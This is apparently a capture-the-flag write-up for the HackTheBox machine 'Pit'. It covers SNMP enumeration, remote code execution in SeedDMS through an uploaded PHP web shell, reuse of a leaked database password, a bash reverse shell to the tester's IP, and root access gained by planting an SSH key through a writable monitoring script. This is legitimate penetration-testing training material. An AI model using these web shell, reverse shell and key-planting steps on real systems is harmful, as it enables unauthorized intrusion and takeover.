Pit is a medium rated machine on HackTheBox created by polarbearer and GibParadox, which is built all around SNMP. We will use SNMP to obtain a directory structure for a website running an application with a known CVE. From this CVE we can get a password which is reused and we gain access to CentOS cockpit as michelle. From there we go back to SNMP, abuse a script that gets triggered by snmpwalk and write a key to rootโs authorized_keys file.
User
Nmap
We start our enumeration as usual with an nmap scan against all ports followed by a script and version detection scan. This time we will also scan the top 1000 udp ports.
All ports
1
2
3
4
5
6
7
8
9
10
11
$ sudo nmap -p- -oA nmap/allports -T4 10.129.147.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 05:32 UTC
Nmap scan report for 10.129.147.172
Host is up (0.033s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
Nmap done: 1 IP address (1 host up) scanned in 138.44 seconds
Script and version
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
$ sudo nmap -sC -sV -p 22,80,9090 -oA nmap/svscan 10.129.147.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 05:36 UTC
Nmap scan report for 10.129.147.172
Host is up (0.033s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.91%T=SSL%I=7%D=5/17%Time=60A2012E%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
...[snip]...
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.26 seconds
The TCP scan shows three ports being open and also reveals a domain name which we add to our /etc/hosts. We also run an UDP scan against this machine which reveals SNMP being open.
UDP scan
1
2
3
4
5
6
7
8
9
$ sudo nmap -sU -oA nmap/udp 10.129.147.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 05:50 UTC
Nmap scan report for 10.129.147.172
Host is up (0.032s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
161/udp open|filtered snmp
Nmap done: 1 IP address (1 host up) scanned in 1090.66 seconds
SNMP
To get more information out of SNMP we run snmpwalk with version one and the public community string. We also use the default OID for the command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ snmpwalk -v1 -c public 10.129.147.172 1.3.6.1.4.1
UCD-SNMP-MIB::prIndex.1 = INTEGER: 1
UCD-SNMP-MIB::prNames.1 = STRING: nginx
UCD-SNMP-MIB::prMin.1 = INTEGER: 1
UCD-SNMP-MIB::prMax.1 = INTEGER: 0
UCD-SNMP-MIB::prCount.1 = INTEGER: 3
UCD-SNMP-MIB::prErrorFlag.1 = INTEGER: noError(0)
UCD-SNMP-MIB::prErrFix.1 = INTEGER: noError(0)
UCD-SNMP-MIB::prErrFixCmd.1 = STRING:
UCD-SNMP-MIB::dskIndex.1 = INTEGER: 1
UCD-SNMP-MIB::dskIndex.2 = INTEGER: 2
UCD-SNMP-MIB::dskPath.1 = STRING: /
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
...[snip]...
Login Name SELinux User MLS/MCS Range Service
__default__ unconfined_u s0-s0:c0.c1023 *
michelle user_u s0 *
root unconfined_u s0-s0:c0.c1023 *
...[snip]...
This reveals a directory structure in the web folder and also a username.
Seeddms
Going over to the website with the found domain we are greeted with a login screen for SeedDMS. We can login with the credentials michelle:michelle.
There exists a known vulnerability for SeedDMS which we can leverage to gain RCE on the target. First we navigate to a folder we have write access to.
We click on Add document and upload a php webshell with the following content.
grem.php
1
<?php system($_REQUEST['cmd']); ?>
After uploading it we take note of the documentid of the uploaded file.
Following the PoC we open the storage location of the uploaded file with the documentid and confirm we have command execution.
We send the request to burp and change the request method to POST for easier handling.
Taking a look around we find a settings.xml file in a conf folder which reveals a password for the database access ied^ieY6xoquu.
CentOS Cockpit
Michelle reused this password for the CentOS cockpit running on port 9090, which results in easy access for us.
Going over to Terminal we can now grab the user flag and continue our way to root.
Root
SNMP RCE
We could finish the machine in the web terminal but for more comfortable access letโs send ourselves a reverse shell back.
1
[michelle@pit ~]$ bash -i >& /dev/tcp/10.10.14.80/443 0>&1
We catch the reverse shell with our ncat listener and upgrade it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ sudo nc -lvnp 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.147.172.
Ncat: Connection from 10.129.147.172:36914.
[michelle@pit ~]$ script -qc /bin/bash /dev/null
script -qc /bin/bash /dev/null
[michelle@pit ~]$ export TERM=xterm
export TERM=xterm
[michelle@pit ~]$ ^Z
[1]+ Stopped sudo nc -lvnp 443
$ stty raw -echo;fg
sudo nc -lvnp 443
[michelle@pit ~]$
Running linpeas reveals an odd ACL entry for the /usr/local/monitoring directory, where the user michelle has write and execute rights but cannot read.
1
2
3
4
5
6
7
8
[+] Files with ACLs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls
# file: /usr/local/monitoring
USER root rwx
user michelle -wx
GROUP root rwx
mask rwx
other ---
Going back to our earlier SNMP enumeration we see that /usr/bin/monitor is called.
1
2
3
4
5
6
7
...[snip]...
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
...[snip]...
Looking at this file we can see it calls all the scripts in the directory we have write-access to with a wildcard in the filename.
1
2
3
4
5
6
7
[michelle@pit ~]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
SeLinux will block most of the commands we can put in this script but we are able to write a ssh key to /root/.ssh/authorized_keys.
check_key.sh
1
2
3
4
5
#!/bin/bash
mkdir /root/.ssh
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMNy7uE1232UpO71JIQ7MBt1U4/43bo/A4PveyCJvIbH+Q1Zy+TA40S/cMWI4oGl0vq0vZPgWv5NK1xUhR+XMYQZuqpuTwZgkMWF1fcOzssmYapiemhchUeP+rANHVsSk3A9CPtLTMiyVFY5aFXnvm0O8gXiw1a6mwEBgX8Se0fEbjqSrvTbQVMmOBo8DI/ZGZYSDpMU/V6va87o7FjbrXkUZQUOWEGI5HPsZbI9VliyL9AhnEQSbxxNvSyobGFL7ew4XmSFpcorSiHwPKwMkJBE3qTnzn3vq/411O4yVElWja9vPolrAeqRb30XHa21zxZrVqWTNK1FaAG5krlZMiYQ+46b9TH+K8wEM4Cj4geq37AdL7kdgIcwYp2ZkPG+F4ETp+tsEVJODIKJD4EzCygNODpz+XVepy3bxHvmFa78SL+CtBYeQpDiRen/EH9racqFD7ZK1n0NaNYwQuVRHvvQK7CChi6BBPYQ5Lt0w16UQG0CABqL2NKRlINDNEam8= jack@parrot' > /root/.ssh/authorized_keys
We chmod our script to be executable and copy it to the monitoring folder.
1
2
[michelle@pit ~]$ chmod +x check_key.sh
[michelle@pit ~]$ cp check_key.sh /usr/local/monitoring/
Right afterwards we run our snmpwalk command from earlier which triggers our script to be run.
1
2
3
4
5
$ snmpwalk -v1 -c public 10.129.147.172 1.3.6.1.4.1
UCD-SNMP-MIB::prIndex.1 = INTEGER: 1
UCD-SNMP-MIB::prNames.1 = STRING: nginx
UCD-SNMP-MIB::prMin.1 = INTEGER: 1
...[snip]...
Now we can simply ssh into the target as the root user and grab the root flag.
1
2
3
4
5
6
7
8
9
$ ssh -i root root@10.129.147.172
Web console: https://pit.htb:9090/
Last login: Tue May 11 04:44:50 2021
[root@pit ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@pit ~]# wc -c /root/root.txt
33 /root/root.txt
[root@pit ~]#